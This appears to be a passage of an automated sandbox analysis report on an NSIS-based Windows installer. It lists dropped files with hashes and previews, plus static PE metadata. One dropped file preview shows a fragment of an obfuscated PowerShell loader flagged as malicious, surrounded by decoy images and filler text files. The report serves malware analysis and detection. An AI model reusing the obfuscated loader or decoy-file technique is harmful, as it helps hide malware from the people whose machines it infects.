Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.`..AO.5.....7.....IE&.0...^sA..Q.Ph.A...K....3I....i.....%-...)iq@....;..(.2)6..i6....&..6.E......g5d!.yy..T../.qWV.....zP.ACM+Z.AU.:w..)....E.@).P......T.9.U..Qp'.V.22...1...n.+..k.Hwv...(.W.]......"....H..i..N.J..[...I4\dp[...#.4QS..c.!.3...nKT..o.t.;p..q..0\|......I..<.v..,f.+.T..9........hL.....6.j..[.P4....2.9\.h.._..p...S.....S^...{s.*?$....K..Jo.Z.f

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Earthquave.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 84x29, components 3
Category:	dropped
Size (bytes):	1129
Entropy (8bit):	7.492802014691465
Encrypted:	false
SSDEEP:	24:D9YMWKo0XxDuLHeOWXG4OZ7DAJuLHenX3cxifNY5nfMexYir49LU6AQkt:D9YMMuERAe75nREKJ
MD5:	CD282EE8089C1EE3F9C62910C4DFD014
SHA1:	CD0515715211C1223FE47166D70B3E3E7F1D63B0
SHA-256:	8D76D8457F8C8744254187B121965EDED313E0511CE12ACBFB97937CF2D65E7F
SHA-512:	3309B112639F53747230FC82D9DACF9F3E9DF3FD460203775E9B0B05F56408FA093DBC43D98905235304AB890DCCE1168BB7FB6BC8C0BAB2F162509C991AC76D
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........T.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.. ..c..HW..9....n.0..f+.G.G../..s<h!W!j1.1n.t. +.?.~..a.*.E.;X...QN.J..GZ......r.Hrp.....F.-.nt.,.7.....%....%..8....sV.......g....7....Emit.a....g..,+..P.Y{f...[.5.&.....i.G.c.Q....z..g...W...4V..fmMo4.N......'\|..H......6......u.K.....S\..C...6.F~H..1...U..\.;...8.R......S.$.L7L...P...m.Z^.k0.#n.....Y..l5.../f.g9e.iS...^...I'.=i."..@.p2.3...c

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Renato.ini

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	362
Entropy (8bit):	4.337172812281414
Encrypted:	false
SSDEEP:	6:jSCOHm209fEbXAaxyoQn+WZAzSU62DKYQ+Rt/6bQwzbEeLwN85NSr705N1:jfCm20abXAdohSUIYvcswzbEUwN2Nv9
MD5:	BC31A14284495AE1DFA382C65A2988E9
SHA1:	A07F44E62160D6C7E89C73CF86F6BE04D2386DAC
SHA-256:	CD800EA596FF2851B38D132DD8F5317EE4413F355E19AACDCE486522F3BBF996
SHA-512:	51409E3FCF7B1E88A1765E3DBED2427B0784F48DD8E8ADEEC22613B332C59ED7EB4B9A188CE46D7F850B8DBFD54E84D142B4D2D811532F8F1F46F253F677D898
Malicious:	false
Preview:	;mosser tilforordnings vinduessystemernes himmelsengene.Concubitus wimick submariner antimethodic degagere weezle millionklassen........Taktreguleringens oliskes rumourer livsarvingernes tonnagen nonreformational,undateable petasuses ferskentrets skewered..udgranskende maa ddemandsknaps bunder matens.Elskvrdigheden preponder trussers..[anuserturalness ricos]..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Stangendes.emm

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	data
Category:	dropped
Size (bytes):	324837
Entropy (8bit):	7.700239586019199
Encrypted:	false
SSDEEP:	6144:PqvIk5iYrVs4peDNZ3UDAlnQjjDYEpHqd1TOf/6J:CvIGVNwDfUlnDtKdZcA
MD5:	AF4DD63E632273302D00B1C85FFBAB5D
SHA1:	CF0397CF497F3BE69F739DFF323F44EB915DA27F
SHA-256:	74433DCE86D2AB989F46238567441A8CC9AFDA1E12A26D26A7706EBB09B3E503
SHA-512:	BA85C33992752314F22B01DBE4FEF7AAAF9470F7FB0AE12535B852C6D242BA42892B5B3A5AF45B18F789555A96EC5A2F78EAC99E91F1C805DA984AF209D8BE0D
Malicious:	false
Preview:	................................................$.k.........BB......W..........CC.........Q............c.....R............l...}}}.......3......_.66666..........................KKK........UUUU.........................\.....?.0..'....X...;...P......................./...EE..PPP.<...............x.....))....]].^^........c."""".....................6.........................{...........}.......(.YY....................X........d....g.+...............S.....N.........kk..8.''''''........................AA....MM.............WWW.....................#.G..FF.++...11..U........................=.................zz............*.................l.........).aa...........YY..P..........SS.......,............qqq...........................KKK.......M......<........hhhhhh...................ii..............6.............ii.......777.....................................O..S..............{{.........................................N.................]].Q....\...............................<<....................

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Steuroperes.ini

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	4.464202733937383
Encrypted:	false
SSDEEP:	12:WLszlFWFCy2kGSQE5iTHBfpwTOHIh1mshaBFbyAajL00HO++ev:/WFCy1ATBRwTCG1JABdy1jLwvw
MD5:	8A382D34048515644E03148916091F21
SHA1:	6B28A0C8CF6EBADF9B9F2DED73759BF940037D6B
SHA-256:	813663CC9FDB74B7577DD9F8792B1E7D72EE6241F51DC6B2AE1B5667BA5F6899
SHA-512:	2FF5C8C1170E83BF21AE04C5895475347BAA86E86F6F230D71D764AE982B24F98C73FF3464E20DDF5E4BC856A441C8DC20150411837DF8507CA585DA2BC41995
Malicious:	false
Preview:	[GISEL FORTRNES]..nonseclusively nedrulnings fjerdeparts somaticosplanchnic bibliotekslovens benightedly tvedelingen outsider mitigations zoilist.Demontering strengespillene politiserendes udvandrerarkiv lanknesses gangsterbanders femtenaarigt dystopias callicantzaros gouramis prioritetsstillingens........manchet merv whitebelly garageanlggene plumpnesses,unsitting tiltrkningskrfternes antistrophal antisquatting radiotelegrafist bulger brownies rektoraters prnumerant tudkopperne..Underkendelsers mellemste fingererings dksmandskaber chemurgies faroelite,besgers coadjutrice readjuster gnathostomous payable..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Undeliverableness.For

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4111), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	69939
Entropy (8bit):	5.199662174430794
Encrypted:	false
SSDEEP:	1536:bF/65rZf5EUhnLFtca8bky18asroOi3sR/xAwaoF015tflUhyJYy+tHH:btMdKUhnJtca8bdKRoOosR/aBqaMjHH
MD5:	4B14090A8FC9B47DF19F0616DFBD5D7A
SHA1:	75C2BA438CB7C76F9A2679399D62B41616120124
SHA-256:	FC71E962731DF2F2807DF049D396430801DA369D241099BAF9B1E3849DAE4713
SHA-512:	E5391A89B7673F4594DE48F9F21BFBB3ABB6D584BE20331C5243A337D649554108030B64DBD786D7333BDEB7FD03DCCC2415D06E562FF6646B0AFABFF4C6CEF5
Malicious:	true
Preview:	$Chelys=$Cuddlingetonblanderen;........$Miskrediterendes = @'.Sprogly.Bevendt$S,utsedfFjerns l egmanaOppebiedcomoriskAsk xylaLyso,ecbChordoteUnifo mlLopolit=Nrreri $PyntersK.nperipvOutasigr gasflauMilieufl RectifeStrutsbrProtacte oatbrusferling;Fu lefl.nringsvfstttevvuS.eglefnBi otafc ontesttU.vikliiMeje itotilfre nAskorbi Fo.blinNStupideoMyotic.nFjernsyaQueingluE itorit LeddelhEnhed to IchthyrSpildeviaand frtCaut voaBrndevitBidskheiArbourevspej dreUndisob2Libanif3 mpning3 Chemeh Therma.(R ndyrk$Lapnin,UBryllupd StipenkChacrariTa yaslkFastprisSkalpel8Tremmek6Bygni g, C lori$IndtgtsCSurkaaluBlodighdS,ippend MitsumlPodningiF.rhaannBanko lg Adverb) Prothy Un.afe{Alufol..vincula.Folkere$Pyrome FRe,tstjoFattigkrStningsn K.lvekuMarkedsfSubro etSkinkleiSievescgThir.ti Bedstra(P imitiSGranifoiCartoonn .levradFrysends AlmuesbDal yteeVarmebevA.uarisgNonrhe ekontrollAlkymirsStavrmoe Sl ndrrusikke,nConfabueDis.incsdeposit fyrsten'PuniskfIbrisketnPligtmetSn glete Skun erJernb,ncOffent,oNonphot$M

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Zeppelineren\interne.txt

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	506
Entropy (8bit):	4.493813328968071
Encrypted:	false
SSDEEP:	12:oXLhhgMpw8XyFTqIptsBqhFOW+H8ErdB1vgfbu2Y6kfpkbM552y:KLhhgMiPFTqIrsyFOW+cErD1v+l2Q/y
MD5:	ABFA0A0488D2B18D6BCB3EAA42ECD65A
SHA1:	BE9135E14A9550A874370772A08D37AED623635F
SHA-256:	A5B7693DC1D8B81CF77C8C4EF4768B369BCF7CA57786C36769B3E547D6BFC4C3
SHA-512:	49AC3E9F6C720F13F06D2AA4672B118900BF70D7BEC1B0F5D8FE7CB4A33D5C17DDC4FE4FAFAEBA82CCA2CACD36CDCF857D554DBE6257AD0BCFA7CFF9C5BA223A
Malicious:	false
Preview:	portmote barrikaderende resocialiseringen sedative ih biometr kager,holdkaptajn costliest rola underlberne morsels sprjtenes..[KYSTLINIE OMBORDVRENDE]..grnsedragningers gladdest statsaut lovmssige melophone nanosomus havnefogedeners,brecciation adjungeres lnningsdage attalea flaadedes hovedpunkternes mellemleddets detailprojekterendes postvsenets..erhvervsfagligt spritsmuglernes rdgardisters parishwide fatiferous concourses interpretament.Plasten bilsted springklappernes plaffer leopards rling........

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Zeppelineren\nrmestes.ini

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	623
Entropy (8bit):	4.463068848977969
Encrypted:	false
SSDEEP:	12:9TVo47zU22Kml9I0VuK+MixPj4EQlMLLBwSjqZwgKi9T2oBsLDr:9TikzU2rmI0F+MixcEQgEiiVZwX
MD5:	4C9DAEE051C23F81797B0AB7C907A8CB
SHA1:	7ABCC1BCB22CC616A7DE1BAD94050C75B2CABBAC
SHA-256:	A76726AF1AF645355198A734B556CE41008F612B8DAEC7D708C35860B1D3D25B
SHA-512:	4DBA5CC9734737DD7DFFC5E50CB0CE90AD72472B1EB248DAC2B78545ED73711EFCE615628A33A8AD27054703778A4DAB45966EE1B1D048485A20CCD08DCA4E5B
Malicious:	false
Preview:	[PONTIAC POSTKASSES]..Arbejdsudygtige elga aaremaalskontrakten krning maoists linjetegninger victorfishes,percher stenfiskerfartjet pommeraner undertjsskuffe boreplatformens seglet tvetullers..Tsarens haemoglobinous lusus dilettante seriemorder statspapirs,ders ejendomsvurderinger skunks doedstraaler..oilberry manhattanize inextensible demilitarised udslynger ingefrl aandeliggjortes legharness.Kanvassers frugtbusken folkish skidtet sangh semimercerised samfundsfags kemikaliefri hvlspaan bestterne harasser........restaurationsbranchernes medlidenhed appetits entom belastningseffekt.Menikas kursnedskrivninger steten..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Zeppelineren\oatcake.txt

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	576
Entropy (8bit):	4.565945433216866
Encrypted:	false
SSDEEP:	12:J5XS78YbKXT/KkX4i8OR0oeu4mnHNLjElcPAXRWkj5Vy8BtdBC8MOVPov:J5XS7XAD9X4i89F+NL2VWkjrJBty8T6
MD5:	68350DACDD5040CE81FA0BC164CC8F04
SHA1:	FE515B0E75D52201F5860CA47091BDD3BC6E6FFC
SHA-256:	41E4CF30DF26AC4006A2C9EC33A7B36A565BB356090EF0119AFE91366CA3CDB3
SHA-512:	2A23BFFB30AF6298E5731935364C56CDC4B7E0B0D0D0FFEF856188B950CD72BE135176B638E0CB208355945F23E62EF675253E9C2FF5043F6D543598243BBD20
Malicious:	false
Preview:	Calenders fstnelser eliminationer dumpekandidaten haruspication funktionsmssigt blodunderlbnes,kirkebn sailless genbrugers dvblinde......[UNMOURNFULLY ANTIZYMOTIC]..selvcensurs infektionssygdoms bygningsprojektering.Remoras fiolstrde shrievalty morosities overabsorption kommandoers revilingly squaloidei yachter..tvanglsere psoriatic stavnsbaandet smaasnakkes skyens songbag aedine kundalini pangyrical opfyldningerne,instillet ministerprsidentposten codeveloping promemorial underemphasizes underlever strbemrkning arbejdsformidlernes..[forbryderbanernes cementeringernes]..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\ady.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 690x732, components 3
Category:	dropped
Size (bytes):	63229
Entropy (8bit):	7.96552454300453
Encrypted:	false
SSDEEP:	1536:QadDl8uYDsNNQ8gs5pbtoASA9TTrgya6FvhfDeIsWYsV6:PdDquzs8dJtoJA1TN5/sjsV6
MD5:	CFD509643497A81BFBFD158FF7AC0347
SHA1:	70A60ECF43922BDAA45D23321B0E228CE8D600DA
SHA-256:	30AB2FA5781142A42D711E20EEBC25DA9E261AE35A5C1D6DC905455BAB40D765
SHA-512:	885B8CE7C1C7B8159075B8EC0B8DDFB610261A8971E1B0920C32AE937CEA4C65A204CD25CEA9854E5CB583C55FBFD3BC7AD537100549F3B58C194D2A4C95AB1D
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......(.E......f.4.g.@-.....(.......4.QE...f..E .4RQ@...K..Z.%-.--%...Q..(...(...(...(...)..P.IE..(.!.....C@..Q@.h..`.....\.N....I.C.4...&.i4...'.:.f..4.E4.B.i...I.&..K..4..E........bbQE.D..b...KH)h...RS.0.R.AK@.N.......R.!E- ...ZZJZ..8qIJ(.s.E.P..QI\.X.RQ@.IIE ..J(....P..IE.:..(...).QE..R.R.@.E.P..E-..QE..QK...)h.(..@.QE..........J.LQK.(.))...R.v...(....IL........f

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\alpinism.ini

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	288
Entropy (8bit):	4.316831707003899
Encrypted:	false
SSDEEP:	6:ZPS+wE5yR8Hwkk3oagK0B7afXkx/BVPS0GJccWOxLnmF9Yvyy:Q0sRSwkzaeNlgDbYYvyy
MD5:	563293D8D1B6446DD386781CB83E99AA
SHA1:	CBC1D9206D810C4DACDF2839891679E6FB44EBBA
SHA-256:	59996913113AD0FEE0C8BCB3A9985FABACCDEC1718AD58D6C0F7BEE1DACDFDB0
SHA-512:	FAE6A6D91AEFF9FF0682CB547C1B3E3CD0EF9ED2F336D7030846ED632D23518747FF083DDB4B7ACD4BDB6B37233E96CD723D3B5C09DAC307A5E51AB7887A1C54
Malicious:	false
Preview:	;fasher divers armbaandets drywall recontaminated tidvise reservationsgebyrerne,middletown snikkerne rublens..............Leaver aggrandising intergradient quotes lakeringerne lokalplanrelevantes geledofficer miljteknikeres sinecureposts friskest ndraabs udskivningens trrehjelmes........

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\bydelsstyre.tal

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	data
Category:	dropped
Size (bytes):	150429
Entropy (8bit):	1.2451735361192335
Encrypted:	false
SSDEEP:	3072:gYU/R5hvXkWE4VBFwF7cGQ+pv7sM4OkvLAfbGaF9LfmRm6KQf1nA:NoA
MD5:	FCABB742EA627DF5C2F5B53930E4B09B
SHA1:	47D8DD9DF6B5CB468F317B4C053213444C89BF67
SHA-256:	9ADEF080D2455F01B30234986322542577179C5F1C1C4AE50CAE829CCEB486D2
SHA-512:	9CCA00A1BEBE61031BD84CE34C62C1332C791FC699C42164CABFAFA596384E84CC735741D94DB06ADC6358C2F727A29EC080A1B3F3CCCD5032D3B67FAED8E869
Malicious:	false
Preview:	.....................S)h..........P................(....................................................v..........H...........^..........{................................................!......................................................................c......................................................\|........x........:.......v.e....................................._...............^.............?................................s..................nu.............n..............3.......................................o..............9...............................D...............................................................t.w..m.............E.......*.......................~................................................................................................L.................................`......................................(...y...........................................#........u.................i............{......................6....

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\eksamenskvotienter.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 793x513, components 3
Category:	dropped
Size (bytes):	68760
Entropy (8bit):	7.968025566790728
Encrypted:	false
SSDEEP:	1536:RuAUpBBjtu4PXDTpl/Izf/krswxx0ffV5Ve+3WVF:gAgBjo4T/yc/xxME+MF
MD5:	BEAAD02E63A0F85E9D939D5B19CCD381
SHA1:	62B831CFDB02120C6EDB9B62881ACD164117F737
SHA-256:	86B60D87C84BC0A371F6A5C7F517F8CF11D8BCD31680717568D275A58389FFC6
SHA-512:	86533810D60405D751367B3BA371C2CADFA2083C5AFBC15AC273374DA7E52A119399054304634A6CDDF89595AA66F2873BE53E1749609AEF10628429D730ED15
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J)...f....3H....P.h....)..Z.;..R.....E.(.....f..3@....gcq~. .*...v..RO..v.W.V-.n....I.~.B....J.}......W`V%....8....2E$..T...D..p..&.... ..sss$..;u...#...Z.V.....+..f..?....,GH...Q....>....J.Rvh...cj$.p..@}...'..F+..xw..D.n3.g.YF....-6?.G....J..k2.]...Kqy..,s..8.t.^F.....~.ii..zL.,...G..Y..=~n...u..6T.{.q...7.u=.`.B.....9.5=.;`....$.w..J...+s[....J.Fn..#..Vs

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\inkarnationers.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 240x649, components 3
Category:	dropped
Size (bytes):	23714
Entropy (8bit):	7.9696212568194005
Encrypted:	false
SSDEEP:	384:puFEqgeSyjTC4MuILa6U4RvNggWUBaD0Gn5lRBBO+Z5WWJnjShuRCCOYPH:pOE4ERLVggB0hlBO+ZJJjSMQS
MD5:	25B32AEA078E3BBE6FA4BF90F7B2BE1E
SHA1:	215C6C64C95AC03D6A9E4D1DBF4216DCA0D1C12D
SHA-256:	B19848765BCD0A7A63108EC328D06A78EE8100F31E036F69161769895C6E297D
SHA-512:	BBD9D67A1463947F55D4B8993DC5BACD734AAEE36D31AD7661DA67C3381B5BDBF8EA42673EB577D08A15BEC7293B85548FD3609440417FC46CC38214BFA8A2EA
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..6...q.v.....Zq...V.0.V.`R....O.b......8......V...@T6..s...p..E..f..;...y S/J..q.Qp..y...Z;r...uk.1.l6...>ar.mg...X..;.V...L....w....@-..94.z..H.zY6..lv1....`S.c..8....K....bh...&9..-=. .^Z...).P.d...d.H[.....e....)...XT....b .. VU...w...ES.....EH..)..+F9.h./5.rX...lz(e".....T...8.....jSx..+.[=.n.t.D........5.e...Oq&......2.7....M...nF...J.t.\In..Mt

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.576851558158566
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	qNNwDeb9BY.exe
File size:	917'121 bytes
MD5:	a0d3de348dd8c0374e58d275a1275359
SHA1:	41ad8293877e331063b01a010edca57948a57910
SHA256:	a5e7b9b7461241382bcc88a1fa2b2a6ad712047709de85ffbc58831318eb4d14
SHA512:	4b35540aac4afb52583d8490a6b3aa0b8c36e8621212ff9b2cbd9ec034ca73796a8ebf3e76e9168e9d5579343546e94f73a2870d7da8e44af232cd1422909bf4
SSDEEP:	24576:wfKw94eLA1u0tmrn69SGL8c25snLMc3XTZsn:wXW3mrn69SGLa72jZsn
TLSH:	8815123C76839B16E87F55356A65D6211A2BBDE01B2F8602B272F74EED35310ED386C0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.<.D.o.D.o.D.oL6.n.D.oL6.n.D.oL6.n.D.o.D.o:D.o^1.n.D.o^1Vo.D.o^1.n.D.oRich.D.o................PE..L...[K.b.................n.

File Icon


Icon Hash:	150d05958b0f4f13

Static PE Info

General

Entrypoint:	0x4036d7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B04B5B [Mon Jun 20 10:26:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F1C24C46F59h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F1C24C46F33h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F1C24C46F2Dh
xor eax, eax
jmp 00007F1C24C46F14h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F1C24C46F2Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F1C24C46F26h
mov eax, dword ptr [esp+38h]
mov dword ptr [00429DF8h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x31f70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c77	0x6e00	36012ab9d2e677680493425a566cfdc6	False	0.6476207386363636	data	6.367752971155868	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	a5f85d051bd98ec2386cbc03dcc4666f	False	0.43013822115384615	data	4.866974222558767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fe00	0x200	3df8362a2e9a26c792a729d2c3b1d553	False	0.22265625	data	1.680046922364517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x31f70	0x32000	3fb8b3735193dd720444ae2613825468	False	0.4827978515625	data	5.094224488652836	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.32240033124334555
RT_ICON	0x5abb0	0x999b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9948630572438522
RT_ICON	0x64550	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.365146100483498
RT_ICON	0x6d9f8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.3761090573012939
RT_ICON	0x72e80	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3752952290977799
RT_ICON	0x770a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.41327800829875516
RT_ICON	0x79650	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.45825515947467166
RT_ICON	0x7a6f8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5036885245901639
RT_ICON	0x7b080	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5159574468085106
RT_DIALOG	0x7b4e8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x7b608	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x7b700	0xa0	data	English	United States	0.6125
RT_DIALOG	0x7b7a0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7b800	0x84	data	English	United States	0.7348484848484849
RT_VERSION	0x7b888	0x2b4	data	English	United States	0.4985549132947977
RT_MANIFEST	0x7bb40	0x42e	XML 1.0 document, ASCII text, with very long lines (1070), with no line terminators	English	United States	0.5149532710280373

Imports

DLL	Import
